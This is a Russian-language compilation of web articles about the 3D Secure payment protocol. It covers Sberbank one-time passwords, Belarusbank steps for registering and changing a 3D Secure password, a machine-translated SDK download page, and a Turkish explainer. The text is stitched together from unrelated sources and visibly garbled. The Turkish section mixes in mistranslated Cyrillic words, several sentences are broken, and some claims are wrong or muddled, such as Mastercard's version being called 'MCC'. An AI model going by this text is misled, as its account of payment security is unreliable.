
Платежные системы предложили свой вариант для проведения безопасных онлайн-покупок — защищенный протокол авторизации пользователя. Как действует защита?  Если плательщик выполняет финансовую транзакцию, то на сайте магазина ему сначала потребуется ввести карточные данные (срок действия, номер, имя держателя и код на обратной стороне). Это первый шаг.

При использовании сервиса дистанционного обслуживания клиентов также может применяться защищенный протокол авторизации

После ввода нужной информации плательщик будет перенаправлен на сайт Сбербанка. 3D Secure — это технология, которая работает через одноразовые пароли. После того как плательщик будет перенаправлен на сайт банковского учреждения, ему потребуется ввести одноразовый пароль, который ему был выдан ранее. Ввод одноразового пароля нужен для того, чтобы удостовериться в том, что платежный инструмент находится в руках его хозяина. Пароль можно получить несколькими методами:

• Пароль будет выслан на номер владельца карты в том случае, если банковский продукт подключен к такой услуге как Мобильный банк. Данный метод является не только самым быстрым, но и самым простым.
• Если такая услуга как Мобильный банк не подключена, то можно использовать список одноразовых кодов для оплаты. Что представляет собой данный список паролей? Это распечатка, на которой указаны 20 паролей, а получить ее можно в любом банкомате банка. Для того чтобы подтвердить оплату, необходимо указать именно тот пароль, чей порядковый номер запрашивает сайт банка.

Если код из СМС будет верен, то оплата будет произведена успешно.

Эксперты полагают, что внедрение защищенного протокола авторизации в несколько раз повышает уровень безопасности карточных счетов. Это не защитит владельца пластика от потери денег на 100%, однако сведет к минимуму попытки мошенников украсть ваши деньги.

При оплате услуг или покупок через интернет на некоторых ресурсах у вас потребуют ввести одноразовый пароль

В целях сохранности средств необходимо вникнуть во все тонкости использования 3D Secure, так как несоблюдение некоторых нюансов может спровоцировать  и появление проблем. Для многих клиентов не всегда является удобным держать телефон все время включенным. Многие картодержатели часто выезжают за пределы страны, и тогда использование телефона становится менее доступным. Кроме того, телефон может в любой момент разрядиться. Даже если выбрать способ подтверждения оплаты кодом из списка паролей, то не все хотели бы носить этот список с собой вместе с пластиком. Можно конечно установить многоразовый пароль 3D Secure, но тогда этим могут воспользоваться злоумышленники.

Как подключить 3D Secure от Сбербанка?

Риск при расчете через интернет всегда будет существовать, какие бы современные технологии не использовались бы. Если изучить все возможные системы защиты, то технология 3D Secure является одной из самых надежных. Услуга может быть подключена автоматически при выдаче карточного продукта. Если подключения не было, то клиент может обратиться в банк с соответствующим заявлением.

Эту услугу можно подключить и с помощью Сбербанк Онлайн. Стоит отметить, что технология 3D Secure отличается высокой стоимостью, поэтому не все банки предлагают своим клиентам к ней подключиться.

Для лидера российской банковской системы важен вопрос внедрения новых технологических разработок, так как это может повысить количество оборотов по эмитируемым картам. Если услуга будет подключена по умолчанию, то за подключение не придется платить никаких денег.

MasterCard для безопасности платежей предусмотрел введение SecureCode

Ввиду того, что технология довольно дорогостоящая, некоторые интернет магазины могут ее не поддерживать. Тем не менее, таких магазинов становится все меньше и меньше, хотя технология и не является обязательной. Существуют и такие интернет магазины, которые работают исключительно с пластиками, использующие защищенный протокол. Для того чтобы отказ от операции на сайте интернет магазина не стал для пользователя неприятным сюрпризом, нужно заранее уточнить, работает ли онлайн магазин с данной технологией или, наоборот, принимает к оплате только обычные пластики.

Как работает 3D Secure?

3D Secure был разработан в свое время платежной системой VISA, назвав дополнительный уровень безопасности VbV. Позже протокол был принят MasterCard и получил MCC. Говоря простым языком, к процедуре аутентификации добавляется еще один дополнительный шаг. Аутентификация основывается на трех доменах, которые не зависят друг от друга. Первым доменом является эквайер — обслуживающий банк или интернет магазин, вторым эмитент – банк, который выпустил данный карточный продукт, а третьим — домен, отвечающей определенной системе платежей.

Многие владельцы пластиков задаются вопросом о необходимости сервиса дополнительной защиты. Отзывы говорят о том, что большинство людей поддерживают ее внедрение.

Так выглядит сообщение о введении пароля для 3D Secure

С каждым годом увеличивается количество интернет ресурсов, принимающих к оплате те карты, которые подключены к одной из современных технологий безопасности. Со временем количество ресурсов будет только расти и возможно не останется магазинов, которые не будут требовать использование технологии.

Услугу можно вовсе и не подключать. Если владелец пластика осуществит свой первый платеж через интернет, ему автоматом будет предложено зарегистрировать карточку в современной программе безопасности. Клиент сможет подключиться к защищенному протоколу уже во время своего первого интернет платежа.

Как обезопасить оплату покупок через интернет(видео)

Специалисты объясняют простыми словами механизм действия защиты проведения банковских операций в интернете.

Заключение

Защищенный протокол авторизации без присутствия карточки является гарантией того, что списанные средства поступят на счет онлайн-ресурса, и используемые данные по карточке не станут известны мошенникам. Тем, кто в большинстве случаев пользуется услугами интернет-магазинов, стоит предусмотреть подобную защиту для своей карточки.

• Поделиться
• Нравится
• Твитнуть
• Класс!
• Нравится

Как подключить 3d secure в ОАО АСБ Беларусбанк

Сегодня все клиенты банка Беларусбанк могут проводить все свои транзакции и операции, благодаря использованию технологии под названием 3d secure. Благодаря такой технологии необходимо будет указывать не только некоторые данные с карты, а также специально придуманный пароль. То есть такой пароль поможет людям дополнительно защитить свои персональные данные и денежные средства.

Кто может воспользоваться таким приложением

Использовать технологию 3d secure могут следующие люди:

• владельцы карт международного образца. Доступно так же на любой из интернет-площадок, где предусмотрены расчеты данной картой;
• любая карта Беларусбанка. Так же они должны поддерживаться всеми площадками в интернете, которые зарегистрированы на территории Белоруссии.

Чтобы использовать данную технологию по максимуму, клиентам необходим хороший доступ к мобильному приложению м-банкинга или же интернет-банкинга.

Как провести регистрацию 3d secure в м-банкинге

Для того, чтобы зарегистрироваться нужно сделать следующее:

• войти в приложение мобильного банкинга, а также открыть раздел Сервисы и его подпункт — 3d secure;
• после этого будет открыта форма, где нужно ввести специальный пароль, содержащий примерно от девяти до пятнадцати символов;
• далее специальное поле под названием «приветствие». Если клиент желает особое приветствие, то просто ввести нужные слова. Если в этом нужды нет, то данный пункт регистрации можно пропустить;
• также нужно заполнить поле «ответ», где будет правильный ответ, на ранее созданный секретный вопрос. Секретный вопрос нужен, чтобы можно было легко поменять придуманный пароль;
• нажать кнопку «Регистрация» и завершить весь процесс. Через некоторое время от системы придет подтверждение активации такой услуги.

В том случае, если человек не помнит ответ на свой секретный вопрос, то тогда процесс регистрации ключа необходимо будет провести еще раз, с целью его восстановления.

Как проводить платежи

Благодаря использованию такой технологии необходимо будет совершать следующие действия:

• на любой из интернет-площадок нужно будет выбрать самый подходящий вариант товара;
• после открытия поля для заказа необходимо будет указать всю нужную информацию касаемо карты, которая будет находиться на другой стороне карты;
• очень тщательно проверить всю информацию;
• указать заранее придуманный секретный пароль.

как подключить, установить, активировать и изменить пароль?

О том, как подключить 3D Secure Беларусбанка, интересуются многие, так как сервис стал приемлемым для большинства клиентов этого банковского учреждения. Подключать его можно для платежных карточек с целью совершения безопасных платежей на сайтах.

Для подтверждения онлайн-платежа необходимо ввести особый код, привязанный к телефонному номеру, а тот в свою очередь привязан к определенной банковской карточке.

Узнав, что такое 3D Secure многие держатели карт желают подключить сервис, так как процент интернет-покупок ежемесячно растет, но и мошенничество само по себе не перестает существовать. Для регистрации безопасного сервиса понадобится одна минута – лучше потратить немного времени и свободно совершать безопасные платежи, чем иметь незащищенную пластиковую карточку.

Пароль 3D Secure Беларусбанка – что это такое и для чего нужен?

Работает 3D Secure по защищенным протоколам, которые предназначены для CNP-операций. Отличается сервис альтернативным вариантом безопасности и относится к дополнительной ступени в процессе осуществления процесса аутентификации при совершении покупок в интернет магазине.

Абсолютной защищенности пользователя 3д секьюрити, поэтому даже при использовании этого вспомогательного инструмента, стоит быть внимательным и опасаться мошенников.

Узнать, что технология поддерживается онлайн-магазином, помогут логотипы Verified visa. При пользовании сервисом дополнительной безопасности стоит отличать код секьюрити от кода CVV2, включающего обычно 3 цифры.

Присваивается пароль vbv вместе с регистрацией пластиковой карточки, которая может быть уже подключена к дистанционному банкингу.

Как подключить этот безопасный сервис Беларусбанка? У пользователя должна быть одна из следующих видов карточек:

1. MasterCard.
2. Visa.
3. Maestro.

Каждый держатель получает вместе с картой в использование специальный код, который служит кодом для входа на сайт интернет-банкинга.

Регистрация на всех банковских сервисах проходит быстро, а для входа используется присвоенный набор символов.

Полезное видео:

Кто может пользоваться 3D Secure?

Пользоваться 3D Secure могут все владельцы действующих карточек Беларусбанка, которые подключены к услугам интернет-банкинга.

Долго раздумывать о том, как получить пароль для нового сервиса не приходится, так как все возможности соединены в одном месте.

Как подключить пароль 3D Secure?

Сервис регистрации пароля относится к бесплатной услуге, но условия подключения могут отличаться в зависимости от того, каким банковским продуктом пользуется держатель карты.

Обычно подключение осуществляется в кабинете интернет-банкинга, который доступен каждому владельцу активной и современной карточки Беларусбанка.

Осуществить активацию сервиса можно в несколько шагов:

• Зайти в раздел интернет-банкинга «3D Secure».
• Пройти процесс регистрации, придумав свой пароль.
• Получить запасной код безопасности, который генерируется системой.
• Внимательно отнестись к разделу «вопрос-секрет», к которому указать ответ и запомнить его.

С помощью Интернет-банкинга

Через интернет-банкинг Беларусбанка можно получить возможность использования 3D Secure, активация которого является безоплатной. Беспокоиться о том, сколько стоит пользование дополнительным безопасным сервисом не стоит.

Из стартовой страницы банкинга пользователю потребуется перейти в окно «Дополнительные услуги» и пройти простую регистрацию с присвоением своего кода для входа.

Фото-инструкция:

Рекомендуем к просмотру:

Через М-банкинг

Для увеличения нажмите на картинку

В мобприложении М-банкинга Беларусбанка для регистрации требуется:

1. Сделать приложение активным (запустить его).
2. Через раздел «Сервисы» — «3 d пароль» перейти в регистрацию.
3. В форме с паролем нужно ввести 9-15 символов – это код для 3D Secure.
4. В пункте «Ответ» нужно указать информацию по секретному вопросу, которым придется воспользоваться, если вы захотите поменять пароль или забудете его.
5. Кнопка «Регистрация» — конечный пункт успешной активации услуги.

 Загрузка …

Порядок проведения платежей через 3D Secure Беларусбанка

Схема работы

Чтобы быть спокойным за свои средства и за безопасность пластиковой карточки, при подключении к 3D Secure нужно знать, в каком порядке осуществляется проведение онлайн-платежей.

Оплата проходит быстро, поэтому нужно иметь максимальную внимательность и точно вводить все требуемые данные. Фраза Payment protected by password говорит о том, что покупка проводится посредством использования защищенного набора.

Пошаговый порядок выглядит так:

• Нужно выбрать нужный товар на интернет-площадке.
• Указать требуемые данные, включая номер карты и CVV код.
• После проверки корректности информации нажать подтверждение.
• Указать присвоенный пароль от секьюрити.

Видео по теме:

Как изменить пароль 3D Secure?

Полезно знать

Если пользователь забыл пароль или захотел изменить его в какой-то момент, то в данном случае можно воспользоваться вопросом-секретом, который открывает доступ к личному ресурсу.

Узнать его владелец пластиковой карточки может во время прохождения регистрации в сервисах интернет-банкинга Беларусбанка.

Как только система распознала успешный ответ на секретный вопрос, можно изменить пароль 3D Secure, используя для этого желаемую комбинацию из цифр и букв. Любой пользователь должен знать, как изменить регистрационные данные на случай возникновения особых ситуаций.

Инструкцию по изменению пароля в личном кабинете:

• Перейти в пункт «Мой профиль».
• Найти «Настройки пароля».
• После открытия небольшого диалогового окна, заполнить требуемые данные.
• Перейти на кнопку изменения пароля.

Как отключить услугу?

3D Secure – это технология безопасного проведения банковских платежей, которую осуществляют в привычном порядке онлайн. Пользователей интересует не только, как активировать, но и как отключить.

Сделать это можно в разделе «Счета с картой», после которого открываются «Дополнительные услуги». В выплывшем меню нажать «Отмена регистрации» — это последний шаг деактивации дополнительного сервиса.

3-D Secure | Варианты загрузки

Все наши элементы управления и библиотеки разработаны и спроектированы специально для каждой из поддерживаемых платформ ниже. Загрузите версию 3-D Secure, соответствующую вашей предполагаемой среде разработки.

3D-Secure Mobile SDK

3-D Secure Mobile SDK — это SDK, сертифицированный EMVCo для Android и iOS. SDK можно использовать с любой программой 3-D Secure 2.2 или 2.1, включая Visa 3-D Secure, American Express SafeKey, Discover ProtectBuy, MasterCard Identify Check и J / Secure.Дополнительные сведения о SDK и его использовании см. В Руководстве по началу работы.

/ n программное обеспечение 3-D Secure Mobile SDK V2 Android Edition

Java Beans для Android

Версия: 2.0.7526 | Изменено: 09.08.2020 | 2,61 МБ

/ n программное обеспечение 3-D Secure Mobile SDK V2 iOS Edition

Нативные платформы Cocoa / C ++ для разработки iOS

Версия: 2.0,7526 | Изменено: 09.08.2020 | 56,23 МБ

Серверные компоненты 3D-Secure

Компоненты сервера 3-D Secure предоставляются в виде библиотеки компонентов, которая позволяет легко интегрировать любую программу 3-D Secure 2.2, 2.1 или 1.0.2, включая Visa 3-D Secure, American Express SafeKey, Discover ProtectBuy, MasterCard Identify Check, и J / Secure. Для получения дополнительных сведений о серверных компонентах см. Руководство по началу работы.

/ n программное обеспечение 3-D Secure Server V2.NET, выпуск

Полностью управляемые компоненты .NET / ASP.NET

Версия: 2.0.7526 | Изменено: 09.08.2020 | 4,21 МБ

/ n программное обеспечение 3-D Secure Server V2 Java Edition

Чистая Java (J2SE / J2EE)

Версия: 2.0.7526 | Изменено: 09.08.2020 | 3,33 МБ

/ n программное обеспечение 3-D Secure Server V2 PHP Edition

Кросс-платформенные библиотеки / расширения компонентов PHP

Версия: 2.0,7526 | Изменено: 09.08.2020 | 3,78 МБ

/ n программное обеспечение 3-D Secure Server V2 C ++ Edition

Классы C ++ для Windows (32-разрядная и 64-разрядная версии), Linux и библиотеки macOS

Версия: 2.0.7526 | Изменено: 09.08.2020 | 8,12 МБ

/ n программное обеспечение 3-D Secure Server V2 Node.js Edition

Пакетные модули Node.js

Версия: 2.0,7526 | Изменено: 09.08.2020 | 9,38 МБ

/ n программное обеспечение 3-D Secure Server V2 Python Edition

Кросс-платформенные библиотеки Python

Версия: 2.0.7526 | Изменено: 09.08.2020 | 8,02 МБ

.

3D Secure

Интернет üzerinden kredi kartı ve banka kartıyla yapılan alışveriş işlemlerinin güvenliğinin artırılması için geliştirilmiş bir sistemdir. Visa ve MasterCard’ın geliştirdiği bu «güvenli sanal alışveriş» çözümleri ile hem kart sahipleri hem de üye işyerleri sahtekarlıklara karşı güvence altına alınmıştır.

Проверено Visa и MasterCard SecureCode logoları bulunan sanal işyerlerinden yapılan online alışverişler Visa ve MasterCard güvencesi altındadır.

• 3D Secure Neden Güvenlidir?

3D Secure sisteminde, sanal ödeme işlemi gerçekleşirken, banka tarafından kart sahibine sadece kendisinin bildiği ödeme şifresi sorulmakta ve kart sahibinin kimliği doğrırulanmaktakt. Yekisiz kişilerin kartlarını internet ortamında kullanması engellenmektedir.

• 3D Secure Nasıl Çalışır?

Kart sahibi, kartını internet bankacılığı kanalıyla bankasına kaydettirir.Kartına bağlı bir şifre ve bir güvenlik soru — cevabı tanımlar.

Карт сахиби, sisteme uyumlu sanal işyerinde alışverişini yapar ve ödeme bölümüne geçer.

Kart sahibinin karşısına, bankası tarafından, işlem şifresini ve kişisel güvenlik mesajını soran bir pop-up ekran açılır.

Карт Sahibi şifresini girerek işleme devam eder. Şifre, banka tarafından doğrulanınca işlem tamamlanır.

3D Secure Ornek Banka Kayıt Ekran Görünümleri

3D Secure AKBANK Ornek Ekran Görünümü

3D Secure Гаранти Bankası Ornek Ekran Görünümü

3D надежен Bankası Ornek Ekran Görünümü

.